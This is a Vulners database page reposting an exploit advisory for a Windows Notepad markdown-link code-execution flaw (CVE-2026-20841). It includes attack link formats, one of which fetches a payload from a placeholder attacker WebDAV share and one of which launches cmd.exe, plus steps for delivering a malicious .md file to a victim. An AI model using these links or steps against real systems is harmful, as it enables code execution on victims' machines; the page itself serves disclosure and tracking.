Vulners
Lucene search
📄 Windows Notepad Markdown Link Code Execution
| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
 | Exploit for CVE-2026-20841 | 12 Feb 202618:59 | – | githubexploit |
| Exploit for CVE-2026-20841 | 12 Feb 202615:29 | – | githubexploit |
| Exploit for CVE-2026-20841 | 12 Feb 202603:58 | – | githubexploit |
| Exploit for Command Injection in Microsoft | 26 Feb 202605:21 | – | githubexploit |
| Exploit for CVE-2026-20841 | 11 Feb 202612:14 | – | githubexploit |
| Exploit for CVE-2026-20841 | 12 Feb 202606:04 | – | githubexploit |
| Exploit for CVE-2026-20841 | 11 Feb 202614:55 | – | githubexploit |
| Exploit for CVE-2026-20841 | 12 Feb 202611:00 | – | githubexploit |
 | CVE-2026-20841 | 10 Feb 202617:51 | – | attackerkb |
 | February Microsoft Patch Tuesday | 11 Feb 202611:08 | – | avleonov |
10
# Exploit Title: Windows Notepad App (Store Version) - Remote/Local
Code Execution via Markdown Link
# Date: 2026-02-26
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://apps.microsoft.com/detail/9msmlrh6lzf3
# Version: Windows Notepad App versions 11.0.0 through 11.2510.14.0
# Tested on: Windows 11 (Notepad 11.2510.14.0)
# CVE: CVE-2026-20841
# CVSS: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Description:
The Windows Notepad App (Microsoft Store version) fails to properly validate
protocol handlers in markdown links. When a user Ctrl+Click on a crafted link
in a .md file, Notepad passes the raw URI to ShellExecuteExW() without
sufficient filtering . This allows execution of arbitrary binaries
in TWO distinct attack scenarios:
1. REMOTE CODE EXECUTION (RCE) - Network Scenario:
- Attacker hosts payload on WebDAV/SMB share
- Link format: `file:///\\attacker@port\DavWWWRoot\payload.py`
- Windows fetches and executes remote payload when clicked
- Confirmed by Microsoft: "load and execute remote files"
2. LOCAL CODE EXECUTION - Offline Scenario:
- Attacker with local access executes system binaries
- Link format: `file://C:/Windows/System32/cmd.exe`
- No network required - payloads already on disk
Affected versions: 11.0.0 through 11.2510.14.0
Fixed in: 11.2510.14.0+ (requires manual Store update)
Note: The patch adds a warning dialog but does NOT block execution
Usage:
1. Modify the attacker IP in remote payloads to your machine
2. Run the script to generate malicious .md file
3. Host payloads on WebDAV/SMB server (for remote attack)
4. Deliver .md file to target
5. Victim opens in vulnerable Notepad and Ctrl+Click any link
# Exploit:
[href](https://github.com/nu11secur1ty/Windows11Exploits/blob/main/2026/CVE-2026-20841/exploit.md)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Feb 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.8
EPSS0.00113
SSVC